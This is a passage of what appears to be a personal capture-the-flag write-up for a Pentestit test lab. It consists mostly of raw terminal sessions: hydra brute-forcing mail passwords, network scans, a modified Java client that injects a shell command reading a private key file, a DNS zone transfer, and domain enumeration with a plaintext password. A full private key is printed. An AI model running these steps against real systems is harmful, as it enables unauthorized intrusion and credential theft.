≫ Next: SSH socks proxy beetwen Lan1 and Lan2

≪ Previous: HackTheBox - Sauna - WriteUP

Crack password for mail

# cat logins_mail.txt

sidorov@test.lab

ivanov@test.lab

petrov@test.lab

support@test.lab

hydra -L logins_mail.txt -P /tmp/1 imap://192.168.101.14 -t 60 -f -I

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04

[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task

[DATA] attacking imap://192.168.101.14:143/

[ERROR] IMAP LOGIN AUTH : 2 NO [AUTHENTICATIONFAILED] Authentication failed.

[143][imap] host: 192.168.101.14 login: support@test.lab password: PASSWORD

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12

telnet 192.168.101.14 imap

Connected to 192.168.101.14.

Escape character is '^]'.

a1 LOGIN support@test.lab PASSWORD

a1 OK

telnet> quit

Connection closed.

root@kali ~/ctf/pentestitlab14 unzip vpn.zip -d vpn

Archive: vpn.zip

extracting: vpn/user

inflating: vpn/vpn.conf

root@kali ~/ctf/pentestitlab14 cd vpn

root@kali ~/ctf/pentestitlab14/vpn ls

user vpn.conf

root@kali ~/ctf/pentestitlab14/vpn

Connect to new VPN

root@kali ~/ctf/pentestitlab14/vpn openvpn --config vpn.conf

Wed Feb 12 18:18:42 2020 WARNING: file 'user' is group or others accessible

Wed Feb 12 18:18:42 2020 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Feb 20 2019

Wed Feb 12 18:18:42 2020 library versions: OpenSSL 1.1.1d 10 Sep 2019, LZO 2.10

Wed Feb 12 18:18:42 2020 WARNING: No server certificate verification method has been enabled. See http://openvpn.net/howto.html#mitm for more info.

Wed Feb 12 18:18:42 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]192.168.101.15:1194

Wed Feb 12 18:18:42 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]

Wed Feb 12 18:18:42 2020 UDP link local (bound): [AF_INET][undef]:1194

Wed Feb 12 18:18:42 2020 UDP link remote: [AF_INET]192.168.101.15:1194

Wed Feb 12 18:18:42 2020 TLS: Initial packet from [AF_INET]192.168.101.15:1194, sid=6b57de4a c850dc54

Wed Feb 12 18:18:42 2020 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this

Wed Feb 12 18:18:42 2020 VERIFY OK: depth=1, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA, name=EasyRSA, emailAddress=support@test.lab

Wed Feb 12 18:18:42 2020 VERIFY OK: depth=0, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=server, name=EasyRSA, emailAddress=support@test.lab

Wed Feb 12 18:18:42 2020 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 2048 bit RSA

Wed Feb 12 18:18:42 2020 [server] Peer Connection Initiated with [AF_INET]192.168.101.15:1194

Wed Feb 12 18:18:43 2020 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)

Wed Feb 12 18:18:43 2020 PUSH: Received control message: 'PUSH_REPLY,route 172.16.0.0 255.255.0.0,route 10.11.0.1,topology net30,ifconfig 10.11.0.42 10.11.0.41,peer-id 9,cipher AES-256-GCM'

Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: --ifconfig/up options modified

Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: route options modified

Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: peer-id set

Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: adjusting link_mtu to 1625

Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: data channel crypto options modified

Wed Feb 12 18:18:43 2020 Data Channel: using negotiated cipher 'AES-256-GCM'

Wed Feb 12 18:18:43 2020 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key

Wed Feb 12 18:18:43 2020 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key

Wed Feb 12 18:18:43 2020 ROUTE_GATEWAY 192.168.51.1/255.255.255.0 IFACE=eth0 HWADDR=08:00:27:a0:58:f0

Wed Feb 12 18:18:43 2020 TUN/TAP device tun1 opened

Wed Feb 12 18:18:43 2020 TUN/TAP TX queue length set to 100

Wed Feb 12 18:18:43 2020 /sbin/ip link set dev tun1 up mtu 1500

Wed Feb 12 18:18:43 2020 /sbin/ip addr add dev tun1 local 10.11.0.42 peer 10.11.0.41

Wed Feb 12 18:18:44 2020 /sbin/ip route add 172.16.0.0/16 via 10.11.0.41

Wed Feb 12 18:18:44 2020 /sbin/ip route add 10.11.0.1/32 via 10.11.0.41

Wed Feb 12 18:18:44 2020 Initialization Sequence Completed

We have new subnet - 172.16.0.0/16

Scan 172.16.0.0/16 (masscan, nmap)

nmap -T5 -n -sn 172.16.0.0/24 ✔ ⚡ 3457 21:21:05

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-13 09:32 CET

Nmap scan report for 172.16.0.11

Host is up (0.071s latency).

Nmap done: 256 IP addresses (1 host up) scanned in 34.57 seconds

Nmap scan report for 172.16.0.20

Host is up (0.052s latency).

Not shown: 850 filtered ports, 139 closed ports

PORT STATE SERVICE

53/tcp open domain

88/tcp open kerberos-sec

135/tcp open msrpc

139/tcp open netbios-ssn

389/tcp open ldap

445/tcp open microsoft-ds

464/tcp open kpasswd5

636/tcp open ldapssl

1024/tcp open kdm

3268/tcp open globalcatLDAP

3269/tcp open globalcatLDAPssl

Nmap scan report for 172.16.0.10

Host is up (0.052s latency).

Not shown: 999 filtered ports

PORT STATE SERVICE

53/tcp open domain

client.jar

root@kali ~/ctf/pentestitlab14 java -jar client.jar

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

/dev/sda1 15G 2.0G 13G 14% /

root@kali ~/ctf/pentestitlab14

edit client.jar

https://www.talksinfo.com/how-to-edit-class-file-from-a-jar/

jar -xf client.jar

oot@kali ~/ctf/pentestitlab14/client-jar cd .. ✔ ⚡ 3397 20:23:21

root@kali ~/ctf/pentestitlab14 cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r ✔ ⚡ 3398 20:24:04

root@kali ~/ctf/pentestitlab14 cd - ✔ ⚡ 3399 20:24:07

~/ctf/pentestitlab14/client-jar

root@kali ~/ctf/pentestitlab14/client-jar jar uf client.jar lab/test/client/Main.class ✔ ⚡ 3400 20:24:13

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

root@kali ~/ctf/pentestitlab14/client-jar java -jar client.jar ✔ ⚡ 3401 20:24:21

one liner:

root@kali ~/ctf/pentestitlab14/client-jar cd .. && cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r && cd client-jar && jar uf client.jar lab/test/client/Main.class && java -jar client.jar

ldc "ls -al /home/dev/.crt;cat /home/dev/.crt/dev.crt;echo -e "\n\n\n\n"; cat /home/dev/.crt/dev.key;"

drwxr-xr-x 2 root root 4096 Nov 14 18:44 .

drwxr-xr-x 3 dev dev 4096 Nov 14 18:42 ..

-rw-r--r-- 1 root root 5358 Nov 14 18:43 dev.crt

-rw-r--r-- 1 root root 1705 Nov 14 18:43 dev.key

Certificate:

Data:

Version: 3 (0x2)

Serial Number: 3 (0x3)

Signature Algorithm: sha256WithRSAEncryption

Issuer: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA/name=EasyRSA/emailAddress=support@test.lab

Validity

Not Before: Nov 14 07:50:50 2019 GMT

Not After : Nov 11 07:50:50 2029 GMT

Subject: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=dev/name=EasyRSA/emailAddress=support@test.lab

Subject Public Key Info:

Public Key Algorithm: rsaEncryption

Public-Key: (2048 bit)

Modulus:

00:ae:dc:b6:2b:c2:31:3e:e6:e7:de:88:e7:c6:a2:

1b:d2:9a:a1:8f:dd:8d:07:03:ad:24:f9:85:d0:dd:

5b:de:96:2f:95:66:b3:cc:25:b5:c6:f1:7f:ec:66:

d8:c7:84:e2:f0:db:6e:4a:8f:ee:b7:f2:c2:6e:cf:

f6:13:eb:a9:ba:2c:58:a3:1e:1f:ab:6b:4a:ec:39:

be:be:b8:3c:67:b2:24:cd:7a:49:fd:00:59:f5:9d:

b8:14:cc:e7:47:ae:ce:03:18:92:21:1d:6f:31:04:

aa:9e:aa:7e:76:99:b4:40:53:33:9f:67:f2:66:7f:

e7:f9:22:2f:c7:3b:8e:3a:08:0c:d7:7b:39:20:e0:

33:38:65:20:91:4c:2b:eb:b3:d4:9b:dd:06:05:90:

ae:47:6b:91:55:2b:9e:06:58:de:62:68:92:d8:94:

2c:f7:61:a1:f6:22:c9:4a:7c:dd:06:bf:fb:0d:b3:

1d:2d:1c:a4:ea:8e:70:28:bd:be:d3:43:23:6f:ba:

dc:94:db:da:82:52:58:fb:36:45:06:c2:c4:37:c5:

e6:c8:73:a5:3d:2f:a6:11:d4:d6:19:29:65:99:8b:

5b:87:e1:51:b0:f6:12:8a:d0:02:84:45:13:85:69:

22:ed:07:44:3c:a7:6b:91:32:a2:4f:2b:9e:79:83:

46:b3

Exponent: 65537 (0x10001)

X509v3 extensions:

X509v3 Basic Constraints:

CA:FALSE

Netscape Comment:

Easy-RSA Generated Certificate

X509v3 Subject Key Identifier:

51:51:D9:D1:8E:E2:36:87:DE:62:E3:98:68:7D:68:DB:E3:AB:35:87

X509v3 Authority Key Identifier:

keyid:61:14:9C:EE:28:7B:A5:2D:69:B6:AB:34:C9:9B:87:73:07:49:20:69

DirName:/C=RU/ST=Moscow/L=Moscow/O=test/OU=test/CN=test CA/name=EasyRSA/emailAddress=support@test.lab

serial:F5:C2:6A:50:05:37:8F:F8

X509v3 Extended Key Usage:

TLS Web Client Authentication

X509v3 Key Usage:

Digital Signature

X509v3 Subject Alternative Name:

DNS:dev

Signature Algorithm: sha256WithRSAEncryption

86:02:4e:d1:25:78:1f:a9:8a:f9:c9:52:7c:4b:92:e4:59:bf:

33:37:86:54:cc:0a:54:a5:5b:8c:70:ba:9d:92:12:24:f8:aa:

80:7a:f0:4b:9a:c1:d1:93:95:c9:72:04:96:d3:8e:30:3d:26:

53:d8:12:e7:31:9a:71:a1:29:31:8b:83:21:fa:fe:e9:93:9b:

af:6c:e4:6f:93:03:ba:a2:8b:53:0f:4d:d9:3b:af:c1:75:36:

3f:3f:1f:28:28:9f:36:37:a3:f2:b8:d7:89:bd:f5:6d:f8:cf:

7a:ac:2f:88:22:6e:9e:00:30:14:db:c6:2f:1b:54:bd:5e:9a:

f5:46:7e:ca:e3:2e:54:f8:29:fd:67:38:9b:14:30:c6:e3:b6:

de:6d:a4:5d:51:84:ec:48:19:7e:40:1f:56:4e:46:52:10:23:

17:57:1c:f0:ce:96:70:9a:f8:e7:7b:51:00:d4:98:ce:09:16:

d7:4b:72:7f:38:aa:ae:42:10:4b:4f:c3:f9:bc:8a:92:03:42:

7b:1f:7c:8c:5e:3c:78:9a:f7:4c:f6:67:47:74:fb:8c:6f:75:

31:8e:e5:43:14:7f:50:9e:c0:4f:fe:d4:ef:d0:44:3c:e5:f2:

f5:46:e8:e9:da:92:b9:f2:d2:42:97:7c:05:b2:22:5d:0b:3b:

71:3d:d0:a0

-----BEGIN CERTIFICATE-----

MIIE+DCCA+CgAwIBAgIBAzANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCUlUx

DzANBgNVBAgTBk1vc2NvdzEPMA0GA1UEBxMGTW9zY293MQ0wCwYDVQQKEwR0ZXN0

MQ0wCwYDVQQLEwR0ZXN0MRAwDgYDVQQDEwd0ZXN0IENBMRAwDgYDVQQpEwdFYXN5

UlNBMR8wHQYJKoZIhvcNAQkBFhBzdXBwb3J0QHRlc3QubGFiMB4XDTE5MTExNDA3

NTA1MFoXDTI5MTExMTA3NTA1MFowgY4xCzAJBgNVBAYTAlJVMQ8wDQYDVQQIEwZN

b3Njb3cxDzANBgNVBAcTBk1vc2NvdzENMAsGA1UEChMEdGVzdDENMAsGA1UECxME

dGVzdDEMMAoGA1UEAxMDZGV2MRAwDgYDVQQpEwdFYXN5UlNBMR8wHQYJKoZIhvcN

AQkBFhBzdXBwb3J0QHRlc3QubGFiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB

CgKCAQEArty2K8IxPubn3ojnxqIb0pqhj92NBwOtJPmF0N1b3pYvlWazzCW1xvF/

7GbYx4Ti8NtuSo/ut/LCbs/2E+upuixYox4fq2tK7Dm+vrg8Z7IkzXpJ/QBZ9Z24

FMznR67OAxiSIR1vMQSqnqp+dpm0QFMzn2fyZn/n+SIvxzuOOggM13s5IOAzOGUg

kUwr67PUm90GBZCuR2uRVSueBljeYmiS2JQs92Gh9iLJSnzdBr/7DbMdLRyk6o5w

KL2+00Mjb7rclNvaglJY+zZFBsLEN8XmyHOlPS+mEdTWGSllmYtbh+FRsPYSitAC

hEUThWki7QdEPKdrkTKiTyueeYNGswIDAQABo4IBWTCCAVUwCQYDVR0TBAIwADAt

BglghkgBhvhCAQ0EIBYeRWFzeS1SU0EgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0G

A1UdDgQWBBRRUdnRjuI2h95i45hofWjb46s1hzCBxwYDVR0jBIG/MIG8gBRhFJzu

KHulLWm2qzTJm4dzB0kgaaGBmKSBlTCBkjELMAkGA1UEBhMCUlUxDzANBgNVBAgT

Bk1vc2NvdzEPMA0GA1UEBxMGTW9zY293MQ0wCwYDVQQKEwR0ZXN0MQ0wCwYDVQQL

EwR0ZXN0MRAwDgYDVQQDEwd0ZXN0IENBMRAwDgYDVQQpEwdFYXN5UlNBMR8wHQYJ

KoZIhvcNAQkBFhBzdXBwb3J0QHRlc3QubGFiggkA9cJqUAU3j/gwEwYDVR0lBAww

CgYIKwYBBQUHAwIwCwYDVR0PBAQDAgeAMA4GA1UdEQQHMAWCA2RldjANBgkqhkiG

9w0BAQsFAAOCAQEAhgJO0SV4H6mK+clSfEuS5Fm/MzeGVMwKVKVbjHC6nZISJPiq

gHrwS5rB0ZOVyXIEltOOMD0mU9gS5zGacaEpMYuDIfr+6ZObr2zkb5MDuqKLUw9N

2TuvwXU2Pz8fKCifNjej8rjXib31bfjPeqwviCJungAwFNvGLxtUvV6a9UZ+yuMu

VPgp/Wc4mxQwxuO23m2kXVGE7EgZfkAfVk5GUhAjF1cc8M6WcJr453tRANSYzgkW

10tyfziqrkIQS0/D+byKkgNCex98jF48eJr3TPZnR3T7jG91MY7lQxR/UJ7AT/7U

79BEPOXy9Ubo6dqSufLSQpd8BbIiXQs7cT3QoA==

-----END CERTIFICATE-----

-----BEGIN PRIVATE KEY-----

MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCu3LYrwjE+5ufe

iOfGohvSmqGP3Y0HA60k+YXQ3Vveli+VZrPMJbXG8X/sZtjHhOLw225Kj+638sJu

z/YT66m6LFijHh+ra0rsOb6+uDxnsiTNekn9AFn1nbgUzOdHrs4DGJIhHW8xBKqe

qn52mbRAUzOfZ/Jmf+f5Ii/HO446CAzXezkg4DM4ZSCRTCvrs9Sb3QYFkK5Ha5FV

K54GWN5iaJLYlCz3YaH2IslKfN0Gv/sNsx0tHKTqjnAovb7TQyNvutyU29qCUlj7

NkUGwsQ3xebIc6U9L6YR1NYZKWWZi1uH4VGw9hKK0AKERROFaSLtB0Q8p2uRMqJP

K555g0azAgMBAAECggEAV6ofSmDY/4gTxuUsDdFH0ZXkWZPhGBsnutm91LClVjpF

MMmEalydfVeloocNNznP7KCV8pumOmJiR9vKqsIDHWsOJPj9N5tavINWtZb38aTF

/p3Iaia68wBXQVZYvP9OGQ9Ac4mmLRUB1Pn03NDCJV2RC+G5DNojGiuheGjLLRv3

2e9inBCF4PSktL4E9u7/2hr5xba2z0aVt47vkxe6Q+InfAHzaGO5S4wao4T4RXZp

CKgITg+9/VBQrHHaKqqwM9l/XZA68svNvD3P00krI9Jn6kriQPK0NKx/n/KyVixV

uG6ij5+tWrvHNihofGR7LoJ8wWMenO0QoMjgoNblQQKBgQDZkIS9udncO2HIB5/n

y2JIB89Ep6PtD1iYLhHInCpuIrYWvktk36GVLCe2TG2/6bqmJyFzM5uv0cnwbCHx

PYFods1/mA80K5p7n4lhviqgeogbC/PbIA4RGYW5JxTDk82LcIs4qg5n27lW+nY6

F7RkOVObXoIvZ5iitHTRjTo4pwKBgQDNwPQj7ER4Yxge7oF+HorXnkEWUiPiRV8K

3qJZS3T1DSxhkDTW+NcJnZ7GE7EGN+V9zFGUHFjoh0vmrFHzIub7n2eClNTvnkko

Z/1T2QLdg4pfnW+MMAqqas78b4m88X5j6C3OvXWvFzzNbqJKxi38M3CAgiS8gUZd

/h9yJ0F3FQKBgQC3lytciqNcI8P8rupyCH9z9xshfTFoTwXczSt2lMl9TM9JW+V1

Rv0sSylrvQzz4ID/yo+AjjE3aZm1xxnRX6x/AZmhrShPRuhCn7qnf3irGRsXb7uk

0mTsaxQbzO3JqETQAPWKqH4liBXbXtk7Zlt0I6f4uQS0igAUdKELX9iciwKBgGyT

nkI2tAszf88S3ZLIW0xdXsuAnR8SrIz334RvpVCLmxgBGWE3/4I7g0XTrl8xsBEq

eQJH00Mh4pPf6376tBmkjOMD1zp7tO91sOFGa5SpjaPXWL4JvBciNghQc8cZSTE/

nKy0nh2/jX57G3mKC0pDeuLVyr0PGysOp1l+DbXhAoGBANNm56+tofNITKiXCdTH

/ZSEuabW2mFxAs2U8HUlwgxv3fc4Uy8JuS+JBpOZ1vuAKLJbkZJiEgk/xTQa3J8i

OfpPfY0tkSzlVe8VWSvvFlS2LoeUBtsdtHlecTTUkFStbmQbYrKX7ATl1xZlcNey

i70HDndxU49PRN/6rMuSTzMK

-----END PRIVATE KEY-----

root@kali ~/ctf/pentestitlab14/client-jar vim dev.crt.172.16.20.2 SIGINT(2) ↵ ⚡ 3447 21:01:00

root@kali ~/ctf/pentestitlab14/client-jar vim dev.key.172.16.20.2 ✔ ⚡ 3450 21:01:51

root@kali ~/ctf/pentestitlab14/client-jar chmod 600 dev.key.172.16.20.2 ✔ ⚡ 3451 21:02:08

root@kali ~/ctf/pentestitlab14/client-jar

cat /opt/token

L0* Dws7m|b;ek

172.16.0.11

root@kali ~/ctf/pentestitlab14 curl http://172.16.0.11/token

#trfioefjio

root@kali ~/ctf/pentestitlab14

DNS

root@kali ~/ctf/pentestitlab14/client-jar dig axfr @172.16.0.20 test.lab. ✔ ⚡ 3515 15:07:15

; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.20 test.lab.

; (1 server found)

;; global options: +cmd

test.lab.3600INSOAad1.test.lab. hostmaster.test.lab. 1 900 600 86400 3600

; Transfer failed.

root@kali ~/ctf/pentestitlab14/client-jar dig axfr @172.16.0.10 test.lab. ✔ ⚡ 3516 15:07:17

; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.10 test.lab.

; (1 server found)

;; global options: +cmd

test.lab.21600INSOAtest.lab. ns1.test.lab. 117 5 30 21600 60

test.lab.21600INNSns1.test.lab.

test.lab.21600INNSns2.test.lab.

test.lab.21600INA172.16.0.20

test.lab.21600INA172.16.50.20

_kerberos._tcp.dc._msdcs.test.lab. 21600 IN SRV0 0 88 test.lab.

_ldap._tcp.dc._msdcs.test.lab. 21600 INSRV0 0 389 test.lab.

gc._msdcs.test.lab.21600INA172.16.50.20

_ldap._tcp.gc._msdcs.test.lab. 21600 INSRV0 0 3268 test.lab.

_kerberos._tcp.test.lab. 21600INSRV0 0 88 test.lab.

_kpasswd._tcp.test.lab.21600INSRV0 0 464 test.lab.

_ldap._tcp.test.lab.21600INSRV0 0 389 test.lab.

_kerberos._udp.test.lab. 21600INSRV0 0 88 test.lab.

_kpasswd._udp.test.lab.21600INSRV0 0 464 test.lab.

admin.test.lab.21600INA172.16.40.3

dc.test.lab.21600INA172.16.50.20

dc1.test.lab.21600INA172.16.50.20

dc2.test.lab.21600INA172.16.0.20

dns.test.lab.21600INA172.16.0.10

dns.test.lab.21600INA172.16.50.10

elastic.test.lab.21600INA172.16.40.6

_ldap._tcp.ForestDnsZones.test.lab. 21600 IN SRV 0 0 389 test.lab.

git.test.lab.21600INA172.16.0.21

mail.test.lab.21600INA172.16.50.3

news.test.lab.21600INA172.16.50.21

ns1.test.lab.21600INA172.16.50.10

ns2.test.lab.21600INA172.16.0.10

site.test.lab.21600INA172.16.50.2

token-SDS34gs93.test.lab. 21600INA127.0.0.1 new token :) (ns)

vpn-1.test.lab.21600INA172.16.50.11

vpn-2.test.lab.21600INA172.16.0.11

test.lab.21600INSOAtest.lab. ns1.test.lab. 117 5 30 21600 60

root@kali ~/ctf/pentestitlab14 enum4linux 172.16.0.20 -u 'DC2\dev' -p 'L1(#@ru0euh0if' 1 ↵ ⚡ 3600 16:25:46

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 13 16:26:10 2020

==========================

| Target Information |

==========================

Target ........... 172.16.0.20

RID Range ........ 500-550,1000-1050

Username ......... ''

Password ......... ''

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

===================================================

| Enumerating Workgroup/Domain on 172.16.0.20 |

===================================================

[+] Got domain/workgroup name: TEST

===========================================

| Nbtstat Information for 172.16.0.20 |

===========================================

Looking up status of 172.16.0.20

DC2 <00> - M <ACTIVE> Workstation Service

DC2 <03> - M <ACTIVE> Messenger Service

DC2 <20> - M <ACTIVE> File Server Service

TEST <1c> - <GROUP> M <ACTIVE> Domain Controllers

TEST <00> - <GROUP> M <ACTIVE> Domain/Workgroup Name

__SAMBA__ <00> - <GROUP> M <ACTIVE> <PERMANENT> Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

====================================

| Session Check on 172.16.0.20 |

====================================

[+] Server 172.16.0.20 allows sessions using username '', password ''

==========================================

| Getting domain SID for 172.16.0.20 |

==========================================

Domain Name: TEST

Domain Sid: S-1-5-21-518050695-217262318-2335301019

[+] Host is part of a domain (not a workgroup)

=====================================

| OS information on 172.16.0.20 |

=====================================

Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.

[+] Got OS info for 172.16.0.20 from smbclient:

[+] Got OS info for 172.16.0.20 from srvinfo:

DC2 Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian

platform_id :500

os version :6.1

server type :0x809a03

============================

| Users on 172.16.0.20 |

============================

index: 0x1 RID: 0x44f acb: 0x00000010 Account: sidorovName: Maksim SidorovDesc:

index: 0x2 RID: 0x1f4 acb: 0x00000010 Account: AdministratorName: Desc: Built-in account for administering the computer/domain

index: 0x3 RID: 0x450 acb: 0x00000010 Account: ivanovName: Ego IvanovDesc:

index: 0x4 RID: 0x458 acb: 0x00000010 Account: leonovName: LeonovDesc:

index: 0x5 RID: 0x457 acb: 0x00000010 Account: petrovName: PetrovDesc:

index: 0x6 RID: 0x1f6 acb: 0x00000011 Account: krbtgtName: Desc: Key Distribution Center Service Account

index: 0x7 RID: 0x1f5 acb: 0x00000215 Account: GuestName: Desc: Built-in account for guest access to the computer/domain

index: 0x8 RID: 0x452 acb: 0x00000010 Account: token_OWdjwifiw0Name: TokenDesc:

user:[Administrator] rid:[0x1f4]

user:[Guest] rid:[0x1f5]

user:[krbtgt] rid:[0x1f6]

user:[sidorov] rid:[0x44f]

user:[ivanov] rid:[0x450]

user:[token_OWdjwifiw0] rid:[0x452]

user:[petrov] rid:[0x457]

user:[leonov] rid:[0x458]

========================================

| Share Enumeration on 172.16.0.20 |

========================================

Sharename Type Comment

--------- ---- -------

netlogon Disk

sysvol Disk

IPC$ IPC IPC Service (Samba 4.5.16-Debian)

SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 172.16.0.20

//172.16.0.20/netlogonMapping: DENIED, Listing: N/A

//172.16.0.20/sysvolMapping: DENIED, Listing: N/A

//172.16.0.20/IPC$[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

===================================================

| Password Policy Information for 172.16.0.20 |

===================================================

[+] Attaching to 172.16.0.20 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] TEST

[+] BUILTIN

[+] Password Info for Domain: TEST

[+] Minimum password length: 7

[+] Password history length: 24

[+] Maximum password age: 268 days 23 hours 59 minutes

[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0

[+] Domain Password Store Cleartext: 0

[+] Domain Password Lockout Admins: 0

[+] Domain Password No Clear Change: 0

[+] Domain Password No Anon Change: 0

[+] Domain Password Complex: 0

[+] Minimum password age: 268 days 2 minutes

[+] Reset Account Lockout Counter: 30 minutes

[+] Locked Account Duration: 30 minutes

[+] Account Lockout Threshold: None

[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled

Minimum Password Length: 7

=============================

| Groups on 172.16.0.20 |

=============================

[+] Getting builtin groups:

group:[Administrators] rid:[0x220]

group:[Users] rid:[0x221]

group:[Guests] rid:[0x222]

group:[Account Operators] rid:[0x224]

group:[Server Operators] rid:[0x225]

group:[Print Operators] rid:[0x226]

group:[Backup Operators] rid:[0x227]

group:[Replicator] rid:[0x228]

group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]

group:[Remote Desktop Users] rid:[0x22b]

group:[Network Configuration Operators] rid:[0x22c]

group:[Incoming Forest Trust Builders] rid:[0x22d]

group:[Performance Monitor Users] rid:[0x22e]

group:[Performance Log Users] rid:[0x22f]

group:[Windows Authorization Access Group] rid:[0x230]

group:[Terminal Server License Servers] rid:[0x231]

group:[Distributed COM Users] rid:[0x232]

group:[IIS_IUSRS] rid:[0x238]

group:[Cryptographic Operators] rid:[0x239]

group:[Event Log Readers] rid:[0x23d]

group:[Certificate Service DCOM Access] rid:[0x23e]

[+] Getting builtin group memberships:

[+] Getting local groups:

group:[Cert Publishers] rid:[0x205]

group:[RAS and IAS Servers] rid:[0x229]

group:[Allowed RODC Password Replication Group] rid:[0x23b]

group:[Denied RODC Password Replication Group] rid:[0x23c]

group:[DnsAdmins] rid:[0x44d]

[+] Getting local group memberships:

Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Cert Publishers

Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Read-Only Domain Controllers

Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\krbtgt

Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Controllers

Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Schema Admins

Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Admins

Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Group Policy Creator Owners

Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Enterprise Admins

[+] Getting domain groups:

group:[Enterprise Read-Only Domain Controllers] rid:[0x1f2]

group:[Domain Admins] rid:[0x200]

group:[Domain Users] rid:[0x201]

group:[Domain Guests] rid:[0x202]

group:[Domain Computers] rid:[0x203]

group:[Domain Controllers] rid:[0x204]

group:[Schema Admins] rid:[0x206]

group:[Enterprise Admins] rid:[0x207]

group:[Group Policy Creator Owners] rid:[0x208]

group:[Read-Only Domain Controllers] rid:[0x209]

group:[DnsUpdateProxy] rid:[0x44e]

[+] Getting domain group memberships:

Group 'Group Policy Creator Owners' (RID: 520) has member: TEST\Administrator

Group 'Schema Admins' (RID: 518) has member: TEST\Administrator

Group 'Domain Admins' (RID: 512) has member: TEST\Administrator

Group 'Enterprise Admins' (RID: 519) has member: TEST\Administrator

======================================================================

| Users on 172.16.0.20 via RID cycling (RIDS: 500-550,1000-1050) |

======================================================================

[I] Found new SID: S-1-5-21-518050695-217262318-2335301019

[I] Found new SID: S-1-5-32

[+] Enumerating users using SID S-1-5-21-518050695-217262318-2335301019 and logon username '', password ''

S-1-5-21-518050695-217262318-2335301019-500 TEST\Administrator (Local User)

S-1-5-21-518050695-217262318-2335301019-501 TEST\Guest (Local User)

S-1-5-21-518050695-217262318-2335301019-502 TEST\krbtgt (Local User)

S-1-5-21-518050695-217262318-2335301019-503 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-504 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-505 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-506 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-507 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-508 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-509 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-510 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-511 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-512 TEST\Domain Admins (Domain Group)

S-1-5-21-518050695-217262318-2335301019-513 TEST\Domain Users (Domain Group)

S-1-5-21-518050695-217262318-2335301019-514 TEST\Domain Guests (Domain Group)

S-1-5-21-518050695-217262318-2335301019-515 TEST\Domain Computers (Domain Group)

S-1-5-21-518050695-217262318-2335301019-516 TEST\Domain Controllers (Domain Group)

S-1-5-21-518050695-217262318-2335301019-517 TEST\Cert Publishers (Local Group)

S-1-5-21-518050695-217262318-2335301019-518 TEST\Schema Admins (Domain Group)

S-1-5-21-518050695-217262318-2335301019-519 TEST\Enterprise Admins (Domain Group)

S-1-5-21-518050695-217262318-2335301019-520 TEST\Group Policy Creator Owners (Domain Group)

S-1-5-21-518050695-217262318-2335301019-521 TEST\Read-Only Domain Controllers (Domain Group)

S-1-5-21-518050695-217262318-2335301019-522 *unknown*\*unknown* (8)

